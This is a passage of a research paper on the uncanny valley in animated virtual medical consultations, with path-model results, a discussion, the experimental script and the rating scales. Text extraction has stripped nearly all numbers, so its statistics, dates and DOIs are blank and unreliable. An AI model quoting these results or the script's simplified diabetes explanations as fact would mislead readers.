eeriness. this model was rejected because the local fit was nonsignificant (β = . , p = . ). in model , depiction had a direct effect on human realism, and human realism had a direct effect on eeriness. model is shown in fig. . the green arrow indicates a depiction . enjoyment– . human realism . . . warmth . . eeriness – . . – . . model depiction . enjoyment– . human realism . . . warmth . eeriness – . . – . . model model depiction . enjoyment– . human realism . . . . eeriness – . . model depiction . human realism . . eeriness – . . figure path models of the indirect effect of enjoyment of computer animation on eeriness. in the path models, the green arrow indicates a positive direct effect, the red arrow indicates a negative direct effect, and the standardized estimate (β) indicates the strength of the effect. the independent variable depiction, indicating computer animated or real, is the exogenous variable. in model , , and , enjoyment mitigated eeriness by increasing human realism. all models had good local fit, but only model and had good global fit (table ). model is the final model. full-size doi: . /peerj-cs. /fig- dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ positive direct effect, the red arrow indicates a negative direct effect, and the width of each arrow indicates the magnitude of the direct effect. the strength of the direct effects is indicated by the standardized estimate (β) next to the green arrow and the red arrow. all estimates were significant (ps � . ), and all of the following criteria for acceptable global fit were met: p > . (cannot reject the exact fit hypothesis), rmsea � . (a cutoff for marginal fit; maccallum, browne & sugawara, ), rmsea êl = (confidence interval includes zero), and the combination rule (cfi � . and srmr � . ; hu & bentler, ). however, model excludes the theoretically important variable enjoyment. table lists the global fit statistics for this and subsequent path models. for model , all estimates were significant (ps � . ), and all global fit criteria were met. however, model excludes the theoretically important variable warmth. model added a direct effect from eeriness to warmth (β = - . , p < . ). although estimates were significant (ps � . ), none of the global fit criteria were met. thus, model was rejected. model added a direct effect from enjoyment to warmth (β = . , p < . ). all estimates were significant (ps � . ), and all global fit criteria were met. thus, model was accepted. it is our final model. as a best practice, it is recommended to compare the final model with theoretically plausible alternative models (kline, ). model was compared with two alternative models by switching the direction of the direct effect between eeriness and warmth (model a) and between both eeriness and warmth and enjoyment and human realism (model b). although all estimates were significant (ps � . ) for these models, model v and rmsea global fit criteria were unmet. thus, these alternative models were rejected. data availability all datasets and r scripts for the analyses are available as supplemental material. discussion each year, nonadherence costs the us healthcare system more than $ billion and results in , deaths (balkrishnan, ; benjamin, ). the global human and financial costs are far greater (cutler et al., ). real clinicians are a limited resource table global fit statistics for path models of eeriness ( , ) and of eeriness and warmth ( , , a, b). model model x q rmsea cfi srmr xm dfm p :̂ % ci . . . [ . , . ] . . . . . [ . , . ] . . . . . [ . , . ] . . . . . [ . , . ] . . a . . . [ . , . ] . . b . . . [ . , . ] . . note: q, number of free parameters; ci, confidence interval. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (chang et al., ; pickersgill, ; sklar, ) as many countries are facing a shortage of physicians, nurses, and other healthcare professionals (bodenheimer, chen & bennett, ; bodenheimer & smith, ; colwill, cultice & kruse, ; potempa, redman & landstrom, ). these shortages reduce opportunities for the clinical supervision of patients, allowing their nonadherence to increase negative health outcomes. developing virtual consultations to promote adherence could improve patient health while reducing healthcare costs and usage (roebuck et al., ). virtual consultations that use real-time computer animation have many advantages over films and other more traditional interventions. 
animated virtual consultations can be revised quickly for immediate distribution on the internet (e.g., using software for real-time animation or video capture in a game engine). without hiring actors, virtual clinicians can be adapted to different conditions and treatments, internationalized and localized to different languages and cultures, and tailored to the patient’s demographic group (desmet et al., ). the controllability of virtual humans and reproducibility of their behavior make virtual consultations an effective platform for experiments investigating clinical interactions. because virtual humans can assume the patient’s role, they can also be used to teach and assess clinical and communication skills (cook & triola, ; parsons et al., ; persky, ; persky & eccleston, ). thus, using computer-animated healthcare providers in clinical settings offers a promising, cost-effective approach to increase patients’ health literacy and adherence to treatment advice (bickmore, pfeifer & jack, ; bickmore et al., b). as predicted, good bedside manner and a subplot highlighting the doctor’s competence increased intention to adhere to treatment advice among role-playing participants in a hypothetical virtual consultation. surprisingly, adherence intention was lower for the doctor portrayed by a real human actor than by his digital double. thus, the uncanny valley phenomenon posed no threat to the effectiveness of the intervention. on the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the real human. contrary to our previous study, the same digital double used in patel & macdorman ( ) was no more eerie than the same human actor, although eeriness predicted lower warmth. we believe that enjoyment of the animation caused the doctor to be perceived as warmer and more human, which mitigated the negative effects of eeriness associated with the uncanny valley. this explanation is compatible with a path model derived from the data. notably, poor bedside manner increased eeriness. limitations and future work the results identified two potential threats to internal validity owing to the methodology. first, the measurement of eeriness was affected by character traits, such as warmth and competence. for example, the doctor with poor bedside manner was rated significantly eerier than the doctor with good bedside manner. the eeriness index was designed to measure eeriness caused by the uncanny valley, which is typically exhibited by inconsistencies in human realism, and not by a cold personality (ho & macdorman, ). the same computer-animated model that was rated eerier than its human counterpart dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in patel & macdorman ( ) was not significantly different in the present study. this may indicate how cues about character traits can dilute an index intended to measure eeriness (zibrek, kokkinara & mcdonnell, ). to control for the compounding effects of the doctor’s bedside manner and outcome on eeriness, the experiment could administer eeriness scales in a pretest: participants would rate the doctor portrayed by either a real human actor or his digital double in a neutral setting— without any cues on warmth, coldness, competence, or incompetence, and before the narrative is introduced. 
a second threat to internal validity concerns difficulty in separating computer animation’s positive contribution to adherence intention and consultation enjoyment from the uncanny valley’s possible negative contribution. this can be achieved by employing two versions of the computer-animated doctor, one with greater inconsistency in human realism than the other. thus, a follow-up experiment could control for the compounding effects of computer animation on enjoyment by independently varying aspect aspects of animation found to modulate eeriness. a threat to external validity is the use of role-playing participants instead of participants who fit the scenario, namely, patients in the initial stage of being diagnosed with type diabetes. a number of studies suggest our results may generalize to actual patients. baylor et al. have found animated pedagogical agents to be effective in increasing motivation and learning (baylor, , ; baylor & kim, ; baylor & ryu, ; kim, baylor & shen, ; plant et al., ). reviews of the literature have found interactive media with immersive narratives to be effective in promoting behavior change and in improving health outcomes (baranowski et al., ; desmet et al., ; lu et al., ; read & shortell, ; thompson, ). interpreting the results of the present study in light of these findings, we believe a computer-animated doctor could be effective in clinical settings. therefore, to confirm effectiveness, a follow-up experiment should be conducted with clinical patients. however, substantial changes to the script would be required to ensure patients assigned to the low warmth and low competence conditions were not harmed relative to current best practices. in addition, certain dramatic elements of the script would need to be revised to render it medically accurate and ethical to employ in a clinical setting. conclusions the uncanny valley is the experience of perceiving simulated humans as eerie (mangan, ). mori ( ), who proposed the theory in , attributed the phenomenon to some features of the simulation appearing more human than others. several empirical studies support his claim (chattopadhyay & macdorman, ; macdorman et al., ; macdorman & chattopadhyay, ; mitchell et al., ; seyama & nagayama, ). this study examined the uncanny valley in a hypothetical virtual consultation, casting in the role of doctor either a real human actor or his digital double. with the exception of patel & macdorman ( ), previous experiments on how human realism affects persuasion have not considered the uncanny valley. further, they dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have lacked the experimental control of using a digital double to simulate the appearance and behavior of a real human. no previous study has addressed these issues with respect to a patient’s intention to adhere to treatment advice. the findings show the effectiveness of a digital double relative to a real human in promoting adherence intention with role-playing participants. in addition, they show increased enjoyment of the consultation with the computer-animated doctor, which could indicate future acceptance of the technology. cues of the doctor’s warmth and competence remained effective despite the use of realistic computer animation. thus, insofar as the uncanny valley may have come into play, it did not impede the effectiveness of the computer-animated virtual consultation. 
patient nonadherence to treatment poses a major threat to public health (iuga & mcguire, ; vermeire et al., ). our findings suggest that an animated virtual consultation could be more effective and enjoyable than a consultation filmed with a real human actor. further testing is needed in clinical settings. the effectiveness of the animated virtual consultation with role-playing participants should encourage the development and clinical testing of this technology, which has advantages over creating content with human actors, such as ease of scenario revision, internationalization, localization, personalization, and web distribution (bickmore, pfeifer & jack, ; bickmore, pfeifer & paasche-orlow, ; bickmore et al., a; desmet et al., ). appendix a: script [text introducing the narrative]. outcome treatment both conditions: one afternoon, you visit dr. richards, a primary care physician, for a routine physical examination. as instructed by the nurse, jane larsson, you ate nothing on the morning of your appointment. low competence: in the waiting room, two women are seated together, and you hear one of them say, “meredith, you deserve compensation. you have a strong case.” high competence: in the waiting room, you overhear a patient, meredith pratley, tell her husband, “the lawyer says, if we sue the doctor, we both could make a ton of money.” both conditions: after the examination, you learn from dr. richards that your blood sugar tested higher than normal. you undergo some further blood work and return to the waiting room. after a while, nurse larson calls you back into the doctor’s office. low competence: walking to the office, the nurse whispers, “dr. richards is up for an award. i’m sure it will go to his head!” high competence: walking to the office, the nurse gushes, “dr. richards is up for an award. today we find out the result!” you are greeted by dr. richards. [depiction treatment: the virtual consultation begins with either computer animation or a recorded video]. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ character treatment dr. richards, poor manner: [rolling eyes peevishly and shaking head]. how’d you like our noisy waiting room? it sounds like the ghetto clinic where dr. mehta volunteers. and they’re all here for me. i inherited this disaster when she took maternity leave so : : : dr. richards, both conditions: i’m sorry you were kept waiting. from your latest blood work, your fasting blood sugar level is , which is higher than we’d like to see. if it tests above again, we’ll have to consider the possibility that you have diabetes. dr. richards, good manner: but don’t be too concerned. it’s not clear you have it, and even if you do, it’s very common, and we know how to treat it. [participant selects a response]. a) what is the chance i have diabetes? b) when will you know for sure whether i have diabetes? c) will you retest my blood glucose level today? d) do my other lab results also indicate diabetes? character treatment dr. richards, good manner: again, i wouldn’t be too concerned because although : : : dr. richards, both conditions: your hemoglobin a c and triglycerides are elevated. these might be signs of diabetes or a prediabetic condition. to be sure, we’ll need to retest you. come back at least hours after taking a meal without processed sugar. i want you to get the results fast, so i’ll fit you in tomorrow : : : dr. richards, poor manner: if somebody cancels. 
right now, i have to reserve my one open slot for a true emergency. [participant selects a response]. a) what should i know about diabetes? b) what type of diabetes do i have? c) is it more likely i have type or type diabetes? d) what is the difference between type and type diabetes? character treatment dr. richards, poor manner: you should know [chuckling] it doesn’t really matter what type of diabetes you have because : : : dr. richards, both conditions: diabetes, both type and , involves your blood sugar being high enough to put your health at risk. this is due to a lack of insulin. in type your body doesn’t make any insulin, because the cells that make it in the pancreas have been killed by the immune system. in type your body makes some insulin, but it’s either not enough or not used well. for both types, the most common symptoms are excessive thirst and frequent urination. if it turned out you had diabetes, it’s probably type , because of the late onset. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dr. richards, good manner: i certainly hope you have neither type, but type is less severe and easier for us to treat. [participant selects a response]. a) i don’t feel thirsty that often. b) i don’t urinate very frequently. c) do you have to feel thirsty and urinate frequently to have diabetes? d) i only have one of those symptoms. character treatment dr. richards, poor manner: [incredulous]. if you’re like most patients, you don’t know how to assess your own symptoms and : : : dr. richards, both conditions: it’s possible to show no symptoms. a third of those with diabetes don’t even know they have it. but it’s important to get treated to keep the symptoms from developing and to prevent complications. dr. richards, good manner: i’m glad to say there are many treatments today that didn’t exist years ago. our understanding of the condition is constantly improving. [participant selects a response]. a) what complications are caused by diabetes? b) what can i do to prevent complications related to diabetes? c) how does the disease progress? d) do the complications of type diabetes differ from type ? character treatment dr. richards, poor manner: [checks time on watch and scoffs] look : : : dr. richards, both conditions: the same complications are associated with both types: heart disease; kidney disease; blindness; a shortened lifespan. however, their risk can be greatly reduced with the right treatment. dr. richards, good manner: so, don’t worry. if you have any health issues, we’ll do [emphatically] everything we can to help you. [participant selects a response]. a) how does diabetes cause blindness? b) why would high blood sugar shorten my life? c) how is a lack of insulin related to heart disease? d) how can diabetes lead to kidney disease? character treatment dr. richards, good manner: that condition might happen, far in the future, to someone who isn’t doing enough to control the disease. [upbeat tone]. but you’re asking great questions. dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dr. richards, both conditions: [rising tone]. how does diabetes cause that? all your organ systems have one thing in common: they rely on proteins to function. if your body doesn’t make enough insulin, sugar binds to those proteins and keep them from working. this is why some people need to inject themselves with insulin. dr. 
dr. richards, poor manner: have you ever made crème brûlée? take some custard—your proteins—sprinkle on sugar and caramelize it with body heat. [chuckling] you're making crème brûlée out of your body.

[participant selects a response].
a) earlier you mentioned treatment options.
b) could you tell me more about what i can do to improve my prospects?
c) will i have to inject myself with insulin?
d) i don't feel comfortable using needles.

character treatment

dr. richards, poor manner: [nodding teasingly]. i bet you're terrified of needles, but in the early stages of diabetes ...

dr. richards, both conditions: injections aren't always necessary. sometimes pills are enough. getting plenty of exercise and eating a sensible diet are also key in stopping the disease from getting worse. we can discuss lifestyle changes at your next appointment ...

dr. richards, poor manner: [impatiently] ... because i've got a waiting room full of people. you see, the trouble is your diet and exercise habits are so ingrained they're almost impossible for you to change. so you might as well go straight to the pills or needles.

[participant selects a response].
a) what's wrong with my current diet?
b) what kind of diet and exercise program do you recommend?
c) i feel i am already exercising enough.
d) is there a type of exercise that is best for people with diabetes?

character treatment

dr. richards, poor manner: let's stop here. the first time you hear [pause] diabetes, you freeze. that's all you hear. you're thinking, "i'm going to lose a foot! i'll go blind!" so there's really no point in talking about your case now. take this brochure. read it before your next appointment, and you'll be able to ask better-informed questions.

dr. richards, good manner: it's important to quantify and monitor improvements in diet and exercise, because people tend to underestimate their food intake and overestimate their exercise time. working with a nutritionist and personal trainer can help with this. you might also consider joining a patient support group. my patients have told me they have learned more in a couple of weeks at a patient support group than in six months of coming to this office, because these groups are run by people who really know what it's like to have the disease. feel free to contact me if you have any questions or concerns. i look forward to seeing you tomorrow.

[subplot ending].

outcome treatment

low competence: nurse larsson: "bad news, dr. richards! meredith pratley decided to go ahead with the malpractice lawsuit." dr. richards: "it's unfortunate she feels that way."

high competence: nurse larsson: "great news, dr. richards! the american college of physicians is honoring you with a fellowship." dr. richards: "that is great news!"

[virtual consultation ends].

appendix b: indices

indicate your level of agreement with the following statements about dr. richards.

goodwill
1. insensitive—sensitive
2. cares about me—doesn't care about me r
3. concerned with me—not concerned with me r
4. not understanding—understanding
5. has my interests at heart—doesn't have my interests at heart r
6. self-centered—not self-centered

trustworthiness
1. honorable—dishonorable r
2. moral—immoral r
3. untrustworthy—trustworthy
4. honest—dishonest r
5. unethical—ethical
6. phony—genuine

competence
1. intelligent—unintelligent r
2. bright—stupid r
3. inexpert—expert
4. incompetent—competent
5. informed—uninformed r
6. untrained—trained

realism
1. computer animated—real
2. replica—original
3. digitally copied—authentic

humanness
1. inanimate—living
2. synthetic—natural
3. mechanical movement—biological movement
4. human-made—humanlike
5. without definite lifespan—mortal

eeriness
1. ordinary—creepy
2. plain—weird
3. predictable—eerie
4. typical—supernatural
5. bland—uncanny
6. dull—freaky
7. boring—shocking
8. uninspiring—spine-tingling

adherence intention
indicate your level of agreement in your role as patient during the consultation. strongly disagree—strongly agree
1. i'd return to dr. richards for diabetes retesting.
2. if i were diagnosed as prediabetic, i would consult a different doctor instead of dr. richards. r
3. i'd ignore any treatment advice from dr. richards. r
4. i'd double my number of meals and cut the quantity in half, if dr. richards said it would prevent complications.
5. i'd inject myself with insulin minutes before each meal if dr. richards recommended it.
6. i'd follow dr. richards' recommendation to exercise at least half an hour each day.
7. i could not rid my diet of sugar even if dr. richards ordered it. r
8. i'd make any lifestyle change dr. richards suggests to stop the disease from progressing.

enjoyment
1. exciting—ordinary
2. suspenseful—predictable
3. boring—interesting r
4. entertaining—dull
5. amusing—tedious
6. unimaginative—imaginative r
7. depressing—cheerful r
8. enjoyable—unpleasant
9. fun—tiresome
10. awkward—adept r
11. professional—amateurish
12. humorous—solemn

supplementary material: videos

the videos may be viewed at doi . /m .figshare. .

acknowledgements

we would like to express our appreciation to himalaya patel, lino stephen, jennifer k. stewart, and zebulun m. wood for helping to produce the interactive visual narratives: himalaya patel filmed and edited the narratives; himalaya patel and zebulun wood took reference photographs for computer modeling; lino stephen modeled the doctor and his props and office; and jennifer k. stewart voiced the nurse.

additional information and declarations

funding
this research was supported by an iupui signature center grant. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosure
the following grant information was disclosed by the authors: an iupui signature center.

competing interests
the authors declare that they have no competing interests.

author contributions
- zhengyan dai performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper.
- karl f. macdorman conceived and designed the experiments, performed the experiments, analyzed the data, contributed materials/tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft.

ethics
the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the study was approved by the indiana university office of research administration (january , , ohrp category , study no. ).
data availability the following information was supplied regarding data availability: the raw data can be found in the supplemental information. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references an lc, demers mr, kirch ma, considine-dunn s, nair v, dasgupta k, narisetty n, resnicow k, ahluwalia j. . a randomized trial of an avatar-hosted multiple behavior change intervention for young adult smokers. journal of the national cancer institute monographs ( ): – doi . /jncimonographs/lgt . anam r, andrade ad, ruiz jg. . promoting lifestyle change through medical avatars. encyclopedia of e-health and telemedicine. : – . hershey: igi global doi . / - - - - .ch . bailenson jn, yee n, merget d, schroeder r. . the effect of behavioral realism and form realism of real-time avatar faces on verbal disclosure, nonverbal disclosure, emotion recognition, and copresence in dyadic interaction. presence: teleoperators and virtual environments ( ): – doi . /pres. . . . balkrishnan r. . the importance of medication adherence in improving chronic-disease related outcomes: what we know and what we need to further know. medical care ( ): – doi . / .mlr. . . f. baranowski t, buday r, thompson di, baranowski j. . playing for real: video games and stories for health-related behavior change. american journal of preventive medicine ( ): – .e doi . /j.amepre. . . . baylor al. . promoting motivation with virtual agents and avatars: role of visual presence and appearance. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . . baylor al. . the design of motivational agents and avatars. educational technology research and development ( ): – doi . /s - - - . baylor al, kim y. . simulating instructional roles through pedagogical agents. international journal of artificial intelligence in education ( ): – . baylor al, ryu j. . the effects of image and animation in enhancing pedagogical agent persona. journal of educational computing research ( ): – doi . /v wq-nwgn-jb -fat . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jncimonographs/lgt http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /pres. . . http://dx.doi.org/ . / .mlr. . . f http://dx.doi.org/ . /j.amepre. . . http://dx.doi.org/ . /rstb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /v wq-nwgn-jb -fat http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ benjamin rm. . medication adherence: helping patients take their medicines as directed. public health reports ( ): – doi . / . bennett jk, fuertes jn, keitel m, phillips r. . the role of patient attachment and working alliance on patient adherence, satisfaction, and health-related quality of life in lupus treatment. patient education and counseling ( ): – doi . /j.pec. . . . bente g, rüggenberg s, krämer nc, eschenburg f. . avatar-mediated networking: increasing social presence and interpersonal trust in net-based collaborations. human communication research ( ): – doi . /j. - . . .x. bickmore tw, pfeifer lm, byron d, forsythe s, henault le, jack bw, silliman r, paasche-orlow mk. a. usability of conversational agents by patients with inadequate health literacy: evidence from two clinical trials. 
journal of health communication (sup ): – doi . / . . . bickmore tw, pfeifer lm, jack bw. . taking the time to care: empowering low health literacy hospital patients with virtual nurse agents. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm, – doi . / . . bickmore tw, pfeifer lm, paasche-orlow mk. . using computer agents to explain medical documents to patients with low health literacy. patient education and counseling ( ): – doi . /j.pec. . . . bickmore tw, puskar k, schlenk ea, pfeifer lm, sereika sm. b. maintaining reality: relational agents for antipsychotic medication adherence. interacting with computers ( ): – doi . /j.intcom. . . . bodenheimer t, chen e, bennett hd. . confronting the growing burden of chronic disease: can the us health care workforce do the job? health affairs ( ): – doi . /hlthaff. . . . bodenheimer ts, smith md. . primary care: proposed solutions to the physician shortage without training more physicians. health affairs ( ): – doi . /hlthaff. . . borel j-c, pepin j-l, pison c, vesin a, gonzalez-bermejo j, court-fortune i, timsit j-f. . long-term adherence with non-invasive ventilation improves prognosis in obese copd patients. respirology ( ): – doi . /resp. . burgoon jk, hale jl. . nonverbal expectancy violations: model elaboration and application to immediacy behaviors. communications monographs ( ): – doi . / . burgoon jk, pfau m, parrott r, birk t, coker r, burgoon m. . relational communication, satisfaction, compliance-gaining strategies, and compliance in communication between physicians and patients. communications monographs ( ): – doi . / . burgoon jk, walther jb. . nonverbal expectancies and the evaluative consequences of violations. human communication research ( ): – doi . /j. - . .tb .x. chaiken s. . communicator physical attractiveness and persuasion. journal of personality and social psychology ( ): – doi . / - . . . . chaiken s. . heuristic versus systematic information processing and the use of source versus message cues in persuasion. journal of personality and social psychology ( ): – doi . / - . . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /hlthaff. . . http://dx.doi.org/ . /hlthaff. . http://dx.doi.org/ . /resp. http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chang g, weiss ap, orav ej, smallwood ja, gonzalez s, kosowsky jm, rauch sl. . bottlenecks in the emergency department: the psychiatric clinicians’ perspective. general hospital psychiatry ( ): – doi . /j.genhosppsych. . . . chattopadhyay d, macdorman kf. . familiar faces rendered strange: why inconsistent realism drives characters into the uncanny valley. journal of vision ( ): doi . / . . . cohen j. . eta-squared and partial eta-squared in fixed factor anova designs. educational and psychological measurement ( ): – doi . / . colwill jm, cultice jm, kruse rl. . will generalist physician supply meet demands of an increasing and aging population? health affairs ( ):w –w doi . /hlthaff. . .w . cook da, triola mm. . virtual patients: a critical literature review and proposed next steps. medical education ( ): – doi . /j. - . . .x. 
cousin g, mast ms, jaunin-stalder n. . when physician-expressed uncertainty leads to patient dissatisfaction: a gender study. medical education ( ): – doi . /medu. . cousin g, mast ms, roter dl, hall ja. . concordance between physician communication style and patient attitudes predicts patient satisfaction. patient education and counseling ( ): – doi . /j.pec. . . . cuddy aj, fiske st, glick p. . warmth and competence as universal dimensions of social perception: the stereotype content model and the bias map. advances in experimental social psychology : – doi . /s - ( ) - . cutler rl, fernandez-llimos f, frommer m, benrimoj c, garcia-cardenas v. . economic impact of medication non-adherence by disease groups: a systematic review. bmj open :e doi . /bmjopen- - . cyr d, hassanein k, head m, ivanov a. . the role of social presence in establishing loyalty in e-service environments. interacting with computers ( ): – doi . /j.intcom. . . . desmet a, van ryckeghem d, compernolle s, baranowski t, thompson d, crombez g, poels k, van lippevelde w, bastiaensens s, van cleemput k, vandebosch h, de bourdeaudhuij i. . a meta-analysis of serious digital games for healthy lifestyle promotion. preventive medicine : – doi . /j.ypmed. . . . fiske st, cuddy aj, glick p. . universal dimensions of social cognition: warmth and competence. trends in cognitive sciences ( ): – doi . /j.tics. . . . fiske st, cuddy aj, glick p, xu j. . a model of (often mixed) stereotype content: competence and warmth respectively follow from perceived status and competition. journal of personality and social psychology ( ): – doi . / - . . . . funke f, reips u-d. . why semantic differentials in web-based research should be made from visual analogue scales and not from -point scales. field methods ( ): – doi . / x . garau m, slater m, pertaub d-p, razzaque s. . the responses of people to virtual humans in an immersive virtual environment. presence: teleoperators and virtual environments ( ): – doi . / . gilbert rl, forney a. . can avatars pass the turing test? intelligent agent perception in a d virtual environment. international journal of human-computer studies : – doi . /j.ijhcs. . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.genhosppsych. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / http://dx.doi.org/ . /hlthaff. . .w http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /medu. http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bmjopen- - http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . /j.ypmed. . . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / x http://dx.doi.org/ . / http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ guadagno re, swinth kr, blascovich j. . social evaluations of embodied agents and avatars. computers in human behavior ( ): – doi . /j.chb. . . . ho c-c, macdorman kf. . revisiting the uncanny valley theory: developing and validating an alternative to the godspeed indices. computers in human behavior ( ): – doi . /j.chb. . . . ho c-c, macdorman kf. . measuring the uncanny valley effect. international journal of social robotics ( ): – . holzwarth m, janiszewski c, neumann mm. . the influence of avatars on online consumer shopping behavior. journal of marketing ( ): – doi . /jmkg. . . . hu l, bentler pm. . cutoff criteria for fit indexes in covariance structure analysis: conventional criteria versus new alternatives. 
structural equation modeling: a multidisciplinary journal ( ): – doi . / . iuga ao, mcguire mj. . adherence and health care costs. risk management and healthcare policy : – doi . /rmhp.s . jackson dl. . revisiting sample size and number of parameter estimates: some support for the n:q hypothesis. structural equation modeling ( ): – doi . /s sem _ . jain sp, posavac ss. . prepurchase attribute verifiability, source credibility, and persuasion. journal of consumer psychology ( ): – doi . /s jcp _ . janssen sm, lagro-janssen al. . a physician’s gender, communication style, patient preferences and patient satisfaction in gynecology and obstetrics: a systematic review. patient education and counseling ( ): – doi . /j.pec. . . . jin s-aa, bolebruch j. . avatar-based advertising in second life: the role of presence and attractiveness of virtual spokespersons. journal of interactive advertising : – doi . / . . . jin s-aa, sung y. . the roles of spokes-avatars’ personalities in brand communication in d virtual environments. journal of brand management ( ): – doi . /bm. . . joseph wb. . the credibility of physically attractive communicators: a review. journal of advertising ( ): – doi . / . . . kätsyri j, förger k, mäkäräinen m, takala t. . a review of empirical evidence on different uncanny valley hypotheses: support for perceptual mismatch as one road to the valley of eeriness. frontiers in psychology : doi . /fpsyg. . . keeling k, mcgoldrick p, beatty s. . avatars as salespeople: communication style, trust, and intentions. journal of business research ( ): – doi . /j.jbusres. . . . khan rf, sutcliffe a. . attractive agents are more persuasive. international journal of human-computer interaction ( ): – doi . / . . . kim y, baylor al, shen e. . pedagogical agents as learning companions: the impact of agent emotion and gender. journal of computer assisted learning ( ): – doi . /j. - . . .x. kim ss, kaplowitz s, johnston mv. . the effects of physician empathy on patient satisfaction and compliance. evaluation & the health professions ( ): – doi . / . kline rb. . principles and practice of structural equation modeling. new york: guilford press. kokkinara e, mcdonnell r. . animation realism affects perceived character appeal of a self-virtual face. in: proceedings of the eighth acm siggraph conference on motion in games. new york: acm, – doi . / . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /jmkg. . . http://dx.doi.org/ . / http://dx.doi.org/ . /rmhp.s http://dx.doi.org/ . /s sem _ http://dx.doi.org/ . /s jcp _ http://dx.doi.org/ . /j.pec. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /bm. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /fpsyg. . http://dx.doi.org/ . /j.jbusres. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lacrosse mb. . nonverbal behavior and perceived counselor attractiveness and persuasiveness. journal of counseling psychology ( ): – doi . / - . . . . lu as, baranowski t, thompson d, buday r. . story immersion of videogames for youth health promotion: a review of literature. games for health: research, development, and clinical applications ( ): – doi . /g h. . . maccallum rc, browne mw, sugawara hm. . power analysis and determination of sample size for covariance structure modeling. psychological methods ( ): – doi . // - x. . . . 
macdorman kf, chattopadhyay d. . reducing consistency in human realism increases the uncanny valley effect; increasing category uncertainty does not. cognition : – doi . /j.cognition. . . . macdorman kf, green rd, ho c-c, koch ct. . too real for comfort? uncanny responses to computer generated faces. computers in human behavior ( ): – doi . /j.chb. . . . maddux je, rogers rw. . effects of source expertness, physical attractiveness, and supporting arguments on persuasion: a case of brains over beauty. journal of personality and social psychology ( ): – doi . / - . . . . mäkäräinen m, kätsyri j, förger k, takala t. . the funcanny valley: a study of positive emotional reactions to strangeness. in: proceedings of the th international academic mindtrek conference. acm, – . mangan b. . the uncanny valley as fringe experience. interaction studies ( ): – doi . /is. . . man. marple bf, fornadley ja, patel aa, fineman sm, fromer l, krouse jh, lanier bq, penna p. . keys to successful management of patients with allergic rhinitis: focus on patient confidence, compliance, and satisfaction. otolaryngology-head and neck surgery ( -suppl):s –s doi . /j.otohns. . . . mast ms, hall ja, roter dl. . disentangling physician sex and physician communication style: their effects on patient satisfaction in a virtual medical visit. patient education and counseling ( ): – doi . /j.pec. . . . mathur mb, reichling db. . navigating a social world with robot partners: a quantitative cartography of the uncanny valley. cognition : – doi . /j.cognition. . . . mccroskey jc, teven jj. . goodwill: a reexamination of the construct and its measurement. communications monographs ( ): – doi . / . mcginnies e, ward cd. . better liked than right: trustworthiness and expertise as factors in credibility. personality and social psychology bulletin ( ): – doi . / . mitchell wj, szerszen ka, lu as, schermerhorn pw, scheutz m, macdorman kf. . a mismatch in the human realism of face and voice produces an uncanny valley. i-perception ( ): – doi . /i . moore rk. . a bayesian explanation of the ‘uncanny valley’ effect and related psychological phenomena. scientific reports ( ): doi . /srep . mori m. . the uncanny valley (macdorman kf, kageki n, trans.). ieee robotics and automation ( ): – doi . /mra. . . o’hair d. . patient 